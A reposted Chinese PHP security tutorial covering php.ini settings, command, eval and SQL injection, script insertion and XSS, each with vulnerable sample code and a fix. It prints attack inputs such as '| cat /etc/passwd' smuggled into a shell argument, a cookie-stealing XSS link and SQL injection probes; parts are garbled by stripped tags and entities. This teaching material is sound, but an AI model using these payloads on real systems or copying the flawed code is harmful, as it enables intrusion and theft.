热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

getcoophp_php防范

针对PHP的网站主要存在下面几种攻击方式:1、命令注入(CommandInjection)2、eval注入(EvalInjection)3、客户端脚本攻击(ScriptInsert

针对 PHP 的网站主要存在下面几种攻击方式:

1、命令注入(Command Injection)2、eval 注入(EvalInjection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting,XSS)5、SQL 注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries,CSRF)7、Session 会话劫持(Session Hijacking)8、Session 固定攻击(Session Fixation)9、HTTP 响应拆分攻击(HTTP Response Splitting)10、文件上传漏洞(FileUpload Attack)11、目录穿越漏洞(Directory Traversal)12、远程文件包含攻击(Remote Inclusion)13、动态函数注入攻击(Dynamic Variable Evaluation)14、URL 攻击(URL attack)15、表单提交欺骗攻击(Spoofed Form Submissions)16、HTTP 请求欺骗攻击(Spoofed HTTP Requests)

以后的每期连载,会逐个介绍这些漏洞的原理和防御方法。

几个重要的 php.ini 选项

Register Globals

php>=4.2.0,php.ini 的 register_globals 选项的默认值预设为 Off,当 register_globals 的设定

为 On 时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于 PHP

不必事先初始化变量的值,从而导致很大的安全隐患。

例1:

//check_admin()用于检查当前用户权限,如果是 admin 设置$is_admin 变量为 true,然后下面

判断此变量是否为 true,然后执行管理的一些操作//ex1.php

{$is_admin = true;

}if ($is_admin)

{

do_something();

}?>这一段代码没有将$is_admin事先初始化为 Flase,如果 register_globals 为 On,那么我们直

接提交 http://www.sectop.com/ex1.php?is_admin=true,就可以绕过 check_admin()的验证

例 2:

//ex2.php

{

do_something();

}else{echo "您尚未登录!";

}?>当 register_globals=On 时 , 我 们 提 交

http://www.sectop.com/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限

所以不管 register_globals 为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变

量要初始化

safe_mode

安全模式,PHP 用来限制文档的存取、限制环境变量的存取,控制外部程序的执行。启用

安全模式必须设置 php.ini 中的 safe_mode =On1、限制文件存取

safe_mode_include_dir= "/path1:/path2:/path3"不同的文件夹用冒号隔开2、限制环境变量的存取

safe_mode_allowed_env_vars= string指定 PHP 程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个

选项的值为空时,那么 php 可以改变任何环境变量

safe_mode_protected_env_vars= string用来指定 php 程序不可改变的环境变量的前缀3、限制外部程序的执行

safe_mode_exec_dir= string此选项指定的文件夹路径影响system、exec、popen、passthru,不影响 shell_exec和“` `”。

disable_functions= string不同的函数名称用逗号隔开,此选项不受安全模式影响

magic quotes

用来让 php 程序的输入信息自动转义,所有的单引号(“'”),双引号(“"”),反斜杠(“\”)和空字

符(NULL),都自动被加上反斜杠进行转义

magic_quotes_gpc = On 用来设置 magic quotes 为 On,它会影响 HTTP 请求的数据(GET、

POST、COOKIEs)

程序员也可以使用 addslashes 来转义提交的 HTTP 请求数据,或者用 stripslashes 来删除转义

PHP 漏洞全解(二)-命令注入攻击

命令注入攻击

PHP 中可以使用下列 5 个函数来执行外部的应用程序或函数

system、exec、passthru、shell_exec、``(与 shell_exec 功能相同)

函数原型

string system(string command, int &return_var)

command 要执行的命令

return_var 存放执行命令的执行后的状态值

string exec (string command, array &output, int &return_var)

command 要执行的命令

output 获得执行命令输出的每一行字符串

return_var 存放执行命令后的状态值

void passthru (string command, int &return_var)

command 要执行的命令

return_var 存放执行命令后的状态值

string shell_exec (string command)

command 要执行的命令

漏洞实例

例 1:

//ex1.php

$dir = $_GET["dir"];

if (isset($dir))

{

echo "

";

system("ls -al ".$dir);

echo "

";

}

?>

我们提交 http://www.sectop.com/ex1.php?dir=| cat /etc/passwd

提交以后,命令变成了 system("ls -al | cat /etc/passwd");

eval 注入攻击

eval 函数将输入的字符串参数当作 PHP 程序代码来执行

函数原型:

mixed eval(string code_str) //eval 注入一般发生在攻击者能控制输入的字符串的时候

//ex2.php

$var = "var";

if (isset($_GET["arg"]))

{

$arg = $_GET["arg"];

eval("\$var = $arg;");

echo "\$var =".$var;

}

?>

当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了

动态函数

func A()

{

dosomething();

}

func B()

{

dosomething();

}

if (isset($_GET["func"]))

{

$myfunc = $_GET["func"];

echo $myfunc();

}

?>

程 序 员 原 意 是 想 动 态 调 用 A 和 B 函 数 , 那 我 们 提 交

http://www.sectop.com/ex.php?func=phpinfo 漏洞产生

防范方法

1、尽量不要执行外部命令

2、使用自定义函数或函数库来替代外部命令的功能

3、使用 escapeshellarg 函数来处理命令参数

4、使用 safe_mode_exec_dir 指定可执行文件的路径

esacpeshellarg 函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引

号“"”,替换成“\"”,分号“;”替换成“\;”

用 safe_mode_exec_dir 指定可执行文件的路径,可以把会使用的命令提前放入此路径内

safe_mode = On

safe_mode_exec_di r= /usr/local/php/bin/

PHP 漏洞全解(三)-客户端脚本植入

客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接

文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。

可以被用作脚本植入的 HTML 标签一般包括以下几种:

1、

程序代码,也可以在 src 属性内指定 js 文件的 URL 路径

2、标签标记的对象。这些对象是 java applet、多媒体文件和 ActiveX 控件等。通常

在 data 属性内指定对象的 URL 路径

3、标签标记的对象。这些对象是多媒体文件,例如:swf 文件。通常在 src 属性内指

定对象的 URL 路径

4、标签标记的对象。这些对象是 java applet,通常在 codebase 属性内指定对象的 URL

路径

5、

标签标记的对象。通常在action 属性内指定要处理表单数据的 web应用程序的 URL

路径

客户端脚本植入的攻击步骤

1、攻击者注册普通用户后登陆网站

2、打开留言页面,插入攻击的 js 代码

3、其他用户登录网站(包括管理员),浏览此留言的内容

4、隐藏在留言内容中的 js 代码被执行,攻击成功

实例

数据库

CREATE TABLE `postmessage` (

`id` int(11) NOT NULL auto_increment,

`subject` varchar(60) NOT NULL default'',

`name` varchar(40) NOT NULL default'',

`email` varchar(25) NOT NULL default'',

`question` mediumtext NOT NULL,

`postdate` datetime NOT NULL default'0000-00-00 00:00:00',

PRIMARY KEY (`id`)

) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' 使 用 者 的 留 言 'AUTO_INCREMENT=69 ;

//add.php 插入留言

//list.php 留言列表

//show.php 显示留言

程序和数据库打包下载地址

点我下载

提交下图的留言

浏览此留言的时候会执行 js 脚本

插入 无限弹框

插入 跳转钓鱼页面

或者使用其他自行构造的 js 代码进行攻击

防范的方法

一般使用 htmlspecialchars 函数来将特殊字符转换成 HTML 编码

函数原型

string htmlspecialchars (string string, int quote_style, string charset)

string 是要编码的字符串

quote_style 可选 , 值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES,默认值

ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都

要转换。ENT_NOQUOTES,表示双引号和单引号都不转换

charset 可选,表示使用的字符集

函数会将下列特殊字符转换成 html 编码:

& ----> &

" ----> "' ----> '

<----> <> ----> >

把 show.php 的第 98行改成然后再查看插入 js 的漏洞页面

PHP 漏洞全解(四)-xss 跨站脚本攻击

XSS(Cross Site Scripting)&#xff0c;意为跨网站脚本攻击&#xff0c;为了和样式表 css(Cascading Style Sheet)区

别&#xff0c;缩写为 XSS

跨站脚本主要被攻击者利用来读取网站用户的 COOKIEs 或者其他个人数据&#xff0c;一旦攻击者得到

这些数据&#xff0c;那么他就可以伪装成此用户来登录网站&#xff0c;获得此用户的权限。

跨站脚本攻击的一般步骤:

1、攻击者以某种方式发送 xss 的 http 链接给目标用户2、目标用户登录此网站&#xff0c;在登陆期间打开了攻击者发送的 xss 链接3、网站执行了此 xss 攻击脚本4、目标用户页面跳转到攻击者的网站&#xff0c;攻击者取得了目标用户的信息5、攻击者使用目标用户的信息登录网站&#xff0c;完成攻击

当 有 存 在 跨 站 漏 洞 的 程 序 出 现 的 时 候 &#xff0c; 攻 击 者 可 以 构 造 类 似

http://www.sectop.com/search.php?key&#61;

kie.php?COOKIE&#61;&#39;&#43;document.COOKIE; &#xff0c;诱骗用户点击后&#xff0c;可以获取用户 COOKIEs 值

防范方法:

利用 htmlspecialchars 函数将特殊字符转换成 HTML 编码

函数原型

string htmlspecialchars (string string, int quote_style, string charset)

string 是要编码的字符串

quote_style 可选 , 值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES&#xff0c;默认值

ENT_COMPAT&#xff0c;表示只转换双引号不转换单引号。ENT_QUOTES&#xff0c;表示双引号和单引号都

要转换。ENT_NOQUOTES&#xff0c;表示双引号和单引号都不转换

charset 可选,表示使用的字符集

函数会将下列特殊字符转换成 html 编码:

& ----> &

" ----> "&#39; ----> &#39;

<----> <> ----> >$_SERVER["PHP_SELF"]变量的跨站

在某个表单中&#xff0c;如果提交参数给自己&#xff0c;会用这样的语句

" method&#61;"POST">

......

$_SERVER["PHP_SELF"]变量的值为当前页面名称

例:http://www.sectop.com/get.php

get.php 中上述的表单

那么我们提交

http://www.sectop.com/get.php/">

那么表单变成

" method&#61;"POST">

跨站脚本被插进去了

防御方法还是使用 htmlspecialchars 过滤输出的变量&#xff0c;或者提交给自身文件的表单使用

这样直接避免了$_SERVER["PHP_SELF"]变量被跨站

PHP 漏洞全解(五)-SQL 注入攻击

SQL 注入攻击(SQL Injection)&#xff0c;是攻击者在表单中提交精心构造的 sql 语句&#xff0c;改变原来的 sql

语句&#xff0c;如果 web程序没有对提交的数据经过检查&#xff0c;那么就会造成 sql 注入攻击。

SQL 注入攻击的一般步骤:

1、攻击者访问有 SQL 注入漏洞的网站&#xff0c;寻找注入点

2、攻击者构造注入语句&#xff0c;注入语句和程序中的 SQL 语句结合生成新的 sql 语句

3、新的 sql 语句被提交到数据库中进行处理

4、数据库执行了新的 SQL 语句&#xff0c;引发 SQL 注入攻击

实例

数据库

CREATE TABLE &#96;postmessage&#96; (

&#96;id&#96; int(11) NOT NULL auto_increment,

&#96;subject&#96; varchar(60) NOT NULL default &#39;&#39;,

&#96;name&#96; varchar(40) NOT NULL default &#39;&#39;,

&#96;email&#96; varchar(25) NOT NULL default &#39;&#39;,

&#96;question&#96; mediumtext NOT NULL,

&#96;postdate&#96; datetime NOT NULL default &#39;0000-00-00 00:00:00&#39;,

PRIMARY KEY (&#96;id&#96;)

) ENGINE&#61;MyISAM DEFAULT CHARSET&#61;gb2312 COMMENT&#61;&#39; 使 用 者 的 留 言 &#39;

AUTO_INCREMENT&#61;69 ;

grant all privileges on ch3.* to &#39;sectop&#39;&#64;localhost identified by &#39;123456&#39;;

//add.php 插入留言

//list.php 留言列表

//show.php 显示留言

程序和数据库打包下载地址

点我下载

页面 http://www.netsos.com.cn/show.php?id&#61;71 可能存在注入点&#xff0c;我们来测试

http://www.netsos.com.cn/show.php?id&#61;71 and 1&#61;1

返回页面

提交 http://www.netsos.com.cn/show.php?id&#61;71 and 1&#61;2

返回页面

一次查询到记录&#xff0c;一次没有&#xff0c;我们来看看源码

//show.php 12-15 行

// 执行 mysql 查询语句$query &#61; "select * from postmessage where id &#61; ".$_GET["id"];$result &#61; mysql_query($query)

or die("执行 ySQL 查询语句失败&#xff1a;". mysql_error());

参数 id 传递进来后&#xff0c;和前面的字符串结合的 sql 语句放入数据库进行查询

提交 and 1&#61;1&#xff0c;语句变成 select * from postmessage where id &#61; 71 and 1&#61;1 这语句前值后值都

为真&#xff0c;and 以后也为真&#xff0c;返回查询到的数据

提交 and 1&#61;2&#xff0c;语句变成 select * from postmessage where id &#61; 71 and 1&#61;2 这语句前值为真&#xff0c;

后值为假&#xff0c;and 以后为假&#xff0c;查询不到任何数据

正常的 SQL 查询&#xff0c;经过我们构造的语句之后&#xff0c;形成了 SQL 注入攻击。通过这个注入点&#xff0c;我

们还可以进一步拿到权限&#xff0c;比如说利用 union 读取管理密码&#xff0c;读取数据库信息&#xff0c;或者用 mysql

的 load_file&#xff0c;into outfile 等函数进一步渗透。

防范方法

整型参数:

使用 intval 函数将数据转换成整数

函数原型

int intval(mixed var, int base)

var 是要转换成整形的变量

base&#xff0c;可选&#xff0c;是基础数&#xff0c;默认是 10

浮点型参数:

使用 floatval 或 doubleval 函数分别转换单精度和双精度浮点型参数

函数原型

int floatval(mixed var)

var 是要转换的变量

int doubleval(mixed var)

var 是要转换的变量

字符型参数:

使用 addslashes 函数来将单引号“&#39;”转换成“\&#39;”&#xff0c;双引号“"”转换成“\"”&#xff0c;反斜杠“\”转换成“\\”&#xff0c;

NULL 字符加上反斜杠“\”

函数原型

string addslashes (string str)

str 是要检查的字符串

那么刚才出现的代码漏洞&#xff0c;我们可以这样修补

// 执行 mysql 查询语句$query &#61; "select * from postmessage where id &#61; ".intval($_GET["id"]);$result &#61; mysql_query($query)

or die("执行 ySQL 查询语句失败&#xff1a;". mysql_error());

如果是字符型&#xff0c;先判断 magic_quotes_gpc 是否为 On,当不为 On 的时候使用 addslashes 转义

特殊字符

if(get_magic_quotes_gpc())

{$var &#61; $_GET["var"];

}

else

{$var &#61; addslashes($_GET["var"]);

}

再次测试&#xff0c;漏洞已经修补



推荐阅读
  • HTTP协议作为互联网通信的基础,其重要性不言而喻。相比JDK自带的URLConnection,HttpClient不仅提升了易用性和灵活性,还在性能、稳定性和安全性方面进行了显著优化。本文将深入解析HttpClient的使用方法与技巧,帮助开发者更好地掌握这一强大的工具。 ... [详细]
  • 初次接触AJAX是在去年,当时主要是通过手动编写客户端代码来实现,还需处理被请求的页面,过程相当繁琐。尽管之前就听说过AJAX.NET,但一直没有机会深入了解。本文将作为初学者的指南,详细介绍AJAX.NET的基本概念、核心功能及其在实际项目中的应用技巧,帮助读者快速上手并掌握这一强大的开发工具。 ... [详细]
  • 微软发布紧急安全更新,所有Windows 10版本均面临影响!
    微软于周五紧急发布了两项安全更新,旨在解决Windows 10所有版本中Windows Codecs库和Visual Studio Code应用存在的安全隐患。此次更新是继本周初发布的月度例行安全补丁之外的额外措施,凸显了这些问题的紧迫性和重要性。这些漏洞可能被攻击者利用,导致系统权限提升或远程代码执行等严重后果。建议用户尽快安装更新,以确保系统的安全性。 ... [详细]
  • Spring 中获取 Request 的多种方式及其线程安全性的深入解析
    本文深入探讨了在Spring MVC框架下获取HTTP请求对象的多种方法,详细分析了每种方法的实现原理及其线程安全性,为开发者提供了全面的技术参考。 ... [详细]
  • 在处理大文件上传时,服务端为何无法直接接收?这主要与 PHP 配置文件 `php.ini` 中的几个关键参数有关,如 `upload_max_filesize` 和 `post_max_size`。这些参数分别限制了单个文件的最大上传大小和整个 POST 请求的数据量。为了实现大文件的高效上传,可以通过文件分割与分片上传的方法来解决。本文将详细介绍这一实现方法,并提供相应的代码示例,帮助开发者更好地理解和应用这一技术。 ... [详细]
  • 本文首先对信息漏洞的基础知识进行了概述,重点介绍了几种常见的信息泄露途径。具体包括目录遍历、PHPINFO信息泄露以及备份文件的不当下载。其中,备份文件下载涉及网站源代码、`.bak`文件、Vim缓存文件和`DS_Store`文件等。目录遍历漏洞的详细分析为后续深入研究奠定了基础。 ... [详细]
  • 本课程详细介绍了如何使用Python Flask框架从零开始构建鱼书应用,涵盖高级编程技巧和实战项目。通过视频教学,学员将学习到Flask的高效用法,包括数据库事务处理和书籍交易模型的实现。特别感谢AI资源网提供的课程下载支持。 ... [详细]
  • MySQL性能优化与调参指南【数据库管理】
    本文详细探讨了MySQL数据库的性能优化与参数调整技巧,旨在帮助数据库管理员和开发人员提升系统的运行效率。内容涵盖索引优化、查询优化、配置参数调整等方面,结合实际案例进行深入分析,提供实用的操作建议。此外,还介绍了常见的性能监控工具和方法,助力读者全面掌握MySQL性能优化的核心技能。 ... [详细]
  • 在处理大规模并发请求时,传统的多线程或多进程模型往往无法有效解决性能瓶颈问题。尽管它们在处理小规模任务时能提升效率,但在高并发场景下,系统资源的过度消耗和上下文切换的开销会显著降低整体性能。相比之下,Python 的 `asyncio` 模块通过协程提供了一种轻量级且高效的并发解决方案。本文将深入解析 `asyncio` 模块的原理及其在实际应用中的优化技巧,帮助开发者更好地利用协程技术提升程序性能。 ... [详细]
  • JVM参数设置与命令行工具详解
    JVM参数配置与命令行工具的深入解析旨在优化系统性能,通过合理设置JVM参数,确保在高吞吐量的前提下,有效减少垃圾回收(GC)的频率,进而降低系统停顿时间,提升服务的稳定性和响应速度。此外,本文还将详细介绍常用的JVM命令行工具,帮助开发者更好地监控和调优JVM运行状态。 ... [详细]
  • 深入解析Wget CVE-2016-4971漏洞的利用方法与安全防范措施
    ### 摘要Wget 是一个广泛使用的命令行工具,用于从 Web 服务器下载文件。CVE-2016-4971 漏洞涉及 Wget 在处理特定 HTTP 响应头时的缺陷,可能导致远程代码执行。本文详细分析了该漏洞的成因、利用方法以及相应的安全防范措施,包括更新 Wget 版本、配置防火墙规则和使用安全的 HTTP 头。通过这些措施,可以有效防止潜在的安全威胁。 ... [详细]
  • MySQL日志分析在应急响应中的应用与优化策略
    在应急响应中,MySQL日志分析对于检测和应对数据库攻击具有重要意义。常见的攻击手段包括弱口令、SQL注入、权限提升和备份数据窃取。通过对MySQL日志的深入分析,不仅可以及时发现潜在的攻击行为,还能详细还原攻击过程并追踪攻击源头。此外,优化日志记录和分析策略,能够提高安全响应效率,增强系统的整体安全性。 ... [详细]
  • 在前一篇文章中,我们介绍了如何使用Requests库发送GET请求。本文将深入探讨如何通过Requests库发送POST请求,包括参数格式、请求封装等关键技巧,并通过“历史上的今天”API实例进行详细说明。 ... [详细]
  • 在Linux环境中,通过编写Shell脚本来实现自定义命令的创建与激活,能够极大地简化服务器上多个子系统的管理操作。例如,通过简单的命令如“tt”,即可快速查看各个应用程序的名称及其运行状态,从而提高系统维护的效率和便捷性。 ... [详细]
  • 综合实训 201521440015
    Chinesepeople’publicsecurityuniversity网络对抗技术实验报告实验五综合渗透学生姓名常泽远年级15区队4指导教师高见信息技术与网络安全学院2018 ... [详细]
author-avatar
yishengyishi2004929_621_834
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有